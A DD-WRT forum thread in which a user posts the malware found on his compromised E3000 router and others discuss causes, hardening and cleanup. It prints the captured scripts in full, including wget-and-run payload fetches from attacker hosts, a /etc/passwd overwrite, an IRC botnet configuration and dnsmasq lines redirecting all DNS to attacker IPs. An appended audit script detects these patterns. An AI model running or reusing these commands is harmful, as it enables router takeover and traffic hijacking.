My e3000 got pwned...by a crafty virus

reece016
DD-WRT Novice


Joined: 19 Dec 2007
Posts: 7

PostPosted: Sun Mar 27, 2011 6:30    Post subject: My e3000 got pwned...by a crafty virus
I came home yesterday to find an interesting screen loaded on both my Mac and Windows computers. Since this strange page was loading regardless of what I would try to do, I started to investigate the router.
I have an e3000 running MEGA - build 15962

Here's the process my router now goes through when it boots up. I didn't wipe the config yet so I could capture what was going on.

The following lines were added to my startup...

while ! ping www.google.com -c 1 > /dev/null ; do
sleep 5
done
cd /tmp;wget http://ilove22.selfip.com/ilove22/dd/x;chmod +x x;./x

this "x" file runs the following...

#!/bin/sh
cd /tmp
wget http://ilove22.selfip.com/ilove22/dd/i.jpg
tar xvf i.jpg
rm -rf i.jpg
cd /tmp/i
chmod +x *
./start
echo "address=/#/123.49.41.249" >> /tmp/dnsmasq.conf;killall -9 dnsmasq;dnsmasq --conf-file=/tmp/dnsmasq.conf

The i.jpg file extracts the following...

i/
i/start
i/rand.txt
i/passwd
i/a.conf
i/int


at this point the "start" file code looks like this...

#!/bin/sh

cat passwd > /etc/passwd

echo "set CTIMEOUT 40" >> mech.conf
echo "server ilove25.selfip.com 6667" >> mech.conf
echo "nick 1 $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt)" >> mech.conf
echo "set ALTNICK $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt) $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt)" >> mech.conf
echo "set cmdchar \`" >> mech.conf
echo "SET CC 1" >> mech.conf
echo "alias ip int echo "IP-ul meu este `nvram get wan_ipaddr`"" >> mech.conf
echo "alias dns int echo "address=/#/79.132.242.146" >> /tmp/dnsmasq.conf;echo "address=/update.microsoft.com/208.75.230.43" >> /tmp/dnsmasq.conf;killall -9 dnsmasq;dnsmasq --conf-file=/tmp/dnsmasq.conf" >> mech.conf
echo "alias stop int cat /tmp/dnsmasq.conf | grep -v address > /tmp/dnsmasq.conf;killall -9 dnsmasq;dnsmasq --conf-file=/tmp/dnsmasq.conf" >> mech.conf
echo "SET FL 25" >> mech.conf
echo "SET SD 1" >> mech.conf
echo "set IDENT $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt)" >> mech.conf
echo "set IRCNAME $(sed `echo $(cat /proc/interrupts | md5sum | sed 's/[^0-9]//g' | cut -c1-4)`"q;d" rand.txt)" >> mech.conf
echo "set LINKPORT 0" >> mech.conf
echo "set MODES 6" >> mech.conf
echo "set UMODES +iwsx" >> mech.conf
echo "set USERFILE a.conf" >> mech.conf
echo "join #interpricer" >> mech.conf

rm -rf dd.jpg
rm -rf start
chmod u+x *
export PATH=.
int

The final result is a Microsoft-looking page telling you that you need to download kb91021753.exe, which I'm going to guess is a virus. I saved it to my Mac but haven't loaded up a sacrificial PC yet to test what it does.
Anyone ever seen this before? I had SSH open and also had port 80 forwarded to my mac mini running Apache, but this looks to have either exploited SSH (I had it on port 22) or there's some other exploit method it used.

I attached all the files I gathered up (including the file that might be a virus) as a ZIP so someone with more knowledge can investigate further. My main concern is that this might be a "man in the middle" type of attack that works to steal passwords/information. Any help would be greatly appreciated.



dd-wrt-hacked.zip
 Description:
The kb91021753.exe is most likely a virus, so DON'T open it unless you are investigating this dd-wrt hack.

 Filename:  dd-wrt-hacked.zip
 Filesize:  2.58 MB
 Downloaded:  639 Time(s)

<Kong>
DD-WRT Guru


Joined: 15 Dec 2010
Posts: 4339
Location: Germany

PostPosted: Sun Mar 27, 2011 8:05
I have a few questions to get an idea what may have caused this:

Did you download this build from dd-wrt site?
Did you password protect webmanagement, did you use ssh password or key etc?
Did you enable remote login through http?
Are you running any optware scripts/apps?
Did you record /var/log/messages to see login attempts?
Have you used a strong ssh password?

_________________
KONG PB's: http://www.desipro.de/ddwrt/
KONG Info: http://tips.desipro.de/
reece016
DD-WRT Novice


Joined: 19 Dec 2007
Posts: 7

PostPosted: Sun Mar 27, 2011 19:17
Andersen wrote:
Scanned the executable file with 37 different virus scanners, only one of them reported it as a malware.

Result = Adware/EShoper.v


Which one of the 37 found it? I may need to change the Anti Virus software I use :). Thanks for running all those scans. Neither of my Anti Virus programs thought it was a threat, but it just seemed like it had to be.
reece016
DD-WRT Novice


Joined: 19 Dec 2007
Posts: 7

PostPosted: Sun Mar 27, 2011 19:38
Did you download this build from dd-wrt site?
yes, from here...
ftp://ftp.dd-wrt.com/others/eko/BrainSlayer-V24-preSP2/2010/12-24-10-r15962/broadcom_K26/dd-wrt.v24-15962_NEWD-2_K2.6_mega-e2k-e3k.bin

Did you password protect webmanagement?
I have web management disabled from the WAN, only internal access.

did you use ssh password or key etc?
I had an SSH password set. Maybe a shared key would be better?

Did you enable remote login through http?
nope, only SSH with username and password.

Are you running any optware scripts/apps?
nope, only forwarding a few ports. Port 80 for web and port 51413 for Transmission.

Did you record /var/log/messages to see login attempts?
No, but I'll look through the WIKI and set that up from now on.

Have you used a strong ssh password?
It was at least 8 characters with a mix of letters/numbers, so it's possible it could have been brute forced over time. I changed the user from "root" when I set it back up so that it will not be possible to log in as root.
<Kong>
DD-WRT Guru


Joined: 15 Dec 2010
Posts: 4339
Location: Germany

PostPosted: Sun Mar 27, 2011 20:00
But you have set a password for the webmanagement interface?

I ask this because it could be a DNS rebinding issue: if you have no password set, your browser could be fooled into sending a POST request to the router adding the wget command to your startup, which is possible if you don't have a password set for the web interface.

_________________
KONG PB's: http://www.desipro.de/ddwrt/
KONG Info: http://tips.desipro.de/
dc
DD-WRT User


Joined: 08 Jun 2006
Posts: 247
Location: Prince Edward Island - Canada

PostPosted: Sun Mar 27, 2011 20:39
reece016 wrote:
<<snip>>
Did you use ssh password or key etc?
I had an SSH password set. Maybe a shared key would be better?

<<snip2>>
Have you used a strong ssh password?
It was at least 8 characters with a mix of letters/numbers, so it's possible it could have been brute forced over time. I changed the user from "root" when I set it back up so that it will not be possible to log in as root.

I've also wondered if authorized keys would be a better way to go..

Also, it doesn't matter if you change your login name, root will still work with ssh. It does add an extra bit of 'security' to the web login though.
<Kong>
DD-WRT Guru


Joined: 15 Dec 2010
Posts: 4339
Location: Germany

PostPosted: Sun Mar 27, 2011 21:32
Yes, using authorized keys is much better, first of all because you cannot use brute force methods anymore to try out passwords; the ssh server will close the connection at once if the client asks for password login.

The second advantage is, even if someone captures your password (keylogger, hardware USB keylogger, camera), he still cannot log in until he also has your key file.

This attack looks like an automated one: someone either scanned lots of machines to find an insecure dd-wrt box, or he placed some code on a website which used a DNS rebinding technique to save this startup command.

If there was only ssh (no ftp etc.) accessible from outside, it is likely the attack came from inside. For automated attacks it also helps to change ports, e.g. the ssh port to 2000; then an attacker would have to scan not just IPs but every port on a target machine, which takes way too long.

Compared to a regular Linux distribution, a router firmware is more secure since it does not include all features in the shipped apps, e.g. lots of proftp bugs did not influence dd-wrt's security since the vulnerable feature was not compiled into dd-wrt's proftp version. The other reason is that you don't directly work on your router, which means local root exploits don't hit you.

Thus, from the info he gave, either there is an unknown security hole in dropbear or there were other exploitable services running on the router.
Or the attack came from the LAN side and had access to the router's web interface, either because he had no web interface password set or was logged in to the web interface at the time he viewed the attacker's site.

_________________
KONG PB's: http://www.desipro.de/ddwrt/
KONG Info: http://tips.desipro.de/
Ben0
DD-WRT Novice


Joined: 02 Jul 2011
Posts: 4

PostPosted: Sat Jul 02, 2011 16:50
Damn it. I got the same message, and I actually ran the kb91021753.exe file. Now there is a C:\Windows\init.exe in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and it comes back after reboot.

Please help me to get rid of the infected router first: How should I check the "startup" script?

I've power cycled the router, but my clean computer still gets directed to the http://update.windows.com/.kb910 page, and "ping" shows that update.windows.com is at [119.226.118.217].

After ssh into router, I ran
nvram get rc_startup
but got blank response.

All the files in the /etc/config folder have an Aug-8-2010 timestamp; that was when I installed this router (DD-WRT v24-sp2 (08/07/10) mini-usb-ftp).

So how should I check and restore the router to normal status, besides uploading an image? Would that help?
redhawk0
DD-WRT Guru


Joined: 04 Jan 2007
Posts: 11522
Location: Wherever the wind blows- North America

PostPosted: Sat Jul 02, 2011 18:01
If it were me...I'd use JTAG and erase nvram, then the kernel...then start over with a fresh tftp load of the firmware. It isn't likely that it embedded itself in the CFE of the router....sounds like it's firmware only.

redhawk
Ben0
DD-WRT Novice


Joined: 02 Jul 2011
Posts: 4

PostPosted: Sat Jul 02, 2011 18:33
The other question is: How was it getting hacked and how to prevent that from happening again?
Ben0
DD-WRT Novice


Joined: 02 Jul 2011
Posts: 4

PostPosted: Sat Jul 02, 2011 18:47
Found the modified entry:
In Additional DNSMasq Options, the textarea has this:
Quote:
address=/#/119.226.118.217


After deleting this item, my clean computer can finally visit the internet. I rebooted the router, and it is still good.

In Admin->Remote Access, I set Allowed Remote IP Range to 192.168.1.0~192.168.1.254 to restrict remote connection.

I think the router is ok now. The next thing I need to do is to clean the kb91021753.exe that has been running in my computers.
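An added audit helper, not from this thread or the DD-WRT project, covering the two persistence points found above: the startup script that fetches and runs a payload (first post) and the dnsmasq "address=" lines that hijack resolution (this post). The sample inputs are constructed, with placeholder hosts and RFC 5737 addresses; the nvram variable name "dnsmasq_options" for "Additional DNSMasq Options" is an assumption.

```shell
#!/bin/sh
# Audit helper (added example, not from the thread or the DD-WRT project).
# Each check takes the text to inspect as $1 and prints the number of
# suspicious lines; audit() combines them into a short verdict.

# Startup lines that download something, then mark it executable or run it
# (the "wget ...;chmod +x x;./x" pattern described in the first post).
count_startup_droppers() {
    printf '%s\n' "$1" | grep -cE '(wget|curl) .*;.*(chmod \+x|\./)' || true
}

# dnsmasq lines that redirect every name (address=/#/...) or override a
# Microsoft/Windows update host, as the payload did via dnsmasq.conf.
count_dns_hijacks() {
    printf '%s\n' "$1" \
        | grep -cE '^address=/(#|[^/]*(microsoft|windows)[^/]*)/' || true
}

# Verdict: "clean", or the space-separated list of what was found.
audit() {
    out=""
    [ "$(count_startup_droppers "$1")" -gt 0 ] && out="$out startup-dropper"
    [ "$(count_dns_hijacks "$2")" -gt 0 ] && out="$out dns-hijack"
    out="${out# }"
    printf '%s\n' "${out:-clean}"
}

# Constructed samples mirroring the thread (placeholder host and IPs).
SAMPLE_STARTUP='while ! ping www.google.com -c 1 > /dev/null ; do
sleep 5
done
cd /tmp;wget http://payload-host.invalid/dd/x;chmod +x x;./x'

SAMPLE_DNSMASQ='interface=br0
address=/#/198.51.100.7
address=/update.microsoft.com/203.0.113.43
expand-hosts'

audit "$SAMPLE_STARTUP" "$SAMPLE_DNSMASQ"   # startup-dropper dns-hijack

# On a live DD-WRT box (assumption: "dnsmasq_options" is the nvram variable
# behind "Additional DNSMasq Options"; rc_startup and /tmp/dnsmasq.conf are
# the locations named in this thread):
#   audit "$(nvram get rc_startup)" \
#         "$(cat /tmp/dnsmasq.conf; nvram get dnsmasq_options)"
```

A blank rc_startup, as Ben0 saw, is why the dnsmasq options are checked separately; the wildcard "address=/#/" line alone is enough to redirect every client behind the router.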
Ben0
DD-WRT Novice


Joined: 02 Jul 2011
Posts: 4

PostPosted: Sun Jul 03, 2011 19:39
I've compiled a description of this attack at:
http://benincampus.blogspot.com/2011/07/attack-initiated-from-attacking-dd-wrt_03.html
crashfly
DD-WRT Guru


Joined: 24 Feb 2009
Posts: 2026
Location: Sol System > Earth > USA > Arkansas

PostPosted: Mon Jul 04, 2011 3:11
Ben0 wrote:
The other question is: How was it getting hacked and how to prevent that from happening again?

Looks like someone was scanning for open SSH ports. Once they found one, they brute forced it. Thank goodness I have a key for mine (and a non-standard port).

Thank you reece016 and Ben0 for reporting the problem. I am hoping people will look at this issue and do more to protect their router.

_________________
E3000 22200M KongVPN K26
WRT600n v1.1 refirb mega 18767 BS K24 NEWD2 [not used]
WRT54G v2 16214 BS K24 [access point]

Try Dropbox for syncing files - get 2.5gb online for free by signing up.

Read! Peacock thread
*PLEASE* upgrade PAST v24SP1 or no support.
hardbase
DD-WRT Novice


Joined: 05 Jul 2011
Posts: 1

PostPosted: Tue Jul 05, 2011 11:20    Post subject: re
So how can I remove this virus?